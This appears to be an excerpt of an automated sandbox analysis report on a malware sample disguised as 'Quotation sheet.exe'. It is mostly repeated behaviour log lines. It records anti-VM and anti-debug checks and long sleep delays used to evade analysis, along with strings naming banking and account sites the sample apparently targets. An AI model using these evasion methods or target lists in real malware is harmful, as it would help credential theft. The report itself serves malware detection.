                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Quotation sheet.exe PID: 5448, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 19E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 3370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 5370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 94E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: A4E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: A6E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: B6E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0537096E rdtsc 7_2_0537096E
                      Source: C:\Users\user\Desktop\Quotation sheet.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3290Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 486Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\Quotation sheet.exe TID: 992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6088Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 3224Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exe TID: 3224Thread sleep time: -84000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe TID: 5700Thread sleep time: -40000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe TID: 5700Thread sleep time: -34500s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7C920 FindFirstFileW,FindNextFileW,FindClose,9_2_02D7C920
                      Source: C:\Users\user\Desktop\Quotation sheet.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: 72Z53078.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: 72Z53078.9.drBinary or memory string: discord.comVMware20,11696487552f
                      Source: 72Z53078.9.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: 72Z53078.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: Quotation sheet.exe, 00000000.00000002.2336603379.0000000001522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 72Z53078.9.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: global block list test formVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: 72Z53078.9.drBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000318C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 72Z53078.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: 72Z53078.9.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: 72Z53078.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: Quotation sheet.exeBinary or memory string: sqemu
                      Source: 72Z53078.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972653059.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                      Source: 72Z53078.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: 72Z53078.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: 72Z53078.9.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: 72Z53078.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: 72Z53078.9.drBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: 72Z53078.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: 72Z53078.9.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: 72Z53078.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: 72Z53078.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: 72Z53078.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: firefox.exe, 0000000D.00000002.2759893628.00000234CC90C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0537096E rdtsc 7_2_0537096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417983 LdrLoadDll,7_2_00417983
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340535 mov eax, dword ptr fs:[00000030h]7_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340535 mov eax, dword ptr fs:[00000030h]7_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340535 mov eax, dword ptr fs:[00000030h]7_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340535 mov eax, dword ptr fs:[00000030h]7_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340535 mov eax, dword ptr fs:[00000030h]7_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340535 mov eax, dword ptr fs:[00000030h]7_2_05340535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E53E mov eax, dword ptr fs:[00000030h]7_2_0535E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6500 mov eax, dword ptr fs:[00000030h]7_2_053C6500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404500 mov eax, dword ptr fs:[00000030h]7_2_05404500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536656A mov eax, dword ptr fs:[00000030h]7_2_0536656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536656A mov eax, dword ptr fs:[00000030h]7_2_0536656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536656A mov eax, dword ptr fs:[00000030h]7_2_0536656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338550 mov eax, dword ptr fs:[00000030h]7_2_05338550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338550 mov eax, dword ptr fs:[00000030h]7_2_05338550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053545B1 mov eax, dword ptr fs:[00000030h]7_2_053545B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053545B1 mov eax, dword ptr fs:[00000030h]7_2_053545B1
